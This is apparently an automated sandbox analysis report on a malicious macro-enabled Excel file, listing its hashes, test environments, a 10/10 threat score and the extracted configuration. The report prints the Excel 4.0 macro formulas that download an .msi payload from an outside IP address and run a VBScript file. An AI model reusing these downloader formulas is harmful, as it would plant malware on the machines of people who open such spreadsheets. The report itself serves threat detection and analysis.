General
Target: 1c959fa7cc8a7558dea798033c44a279
Size: 6KB
Sample: 231221-2v7vtsfhgn
MD5: 1c959fa7cc8a7558dea798033c44a279
SHA1: 22c07d1124dffb65e20a94cf1d79b7e1e4883e75
SHA256: 0d4c43a954f7a7aec20289956f4333c3d59a15697cedb0872f2fca4a6cb2236b
SHA512: af19620066d2e0be64149960446e0ce8889dabcbc13d49c5b0541b57997306faeb917cfea7dfb1fadfc59851269c0ffb639e14c0e12e21a0de9b9f3a48a79585
SSDEEP: 192:NDSduSrbrA2OmmfRW8UhHFBFYuwb98y+v+ovc:NGuwM2wQ1FYhb98y+H0
Static task: static1
Behavioral task: behavioral1
Sample: 1c959fa7cc8a7558dea798033c44a279.xlsm
Resource: win7-20231215-en
Behavioral task: behavioral2
Sample: 1c959fa7cc8a7558dea798033c44a279.xlsm
Resource: win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0)
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0)
=EXEC("wscript C:\zer\spp.vbs")
=HALT()
Targets
Score: 10/10
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.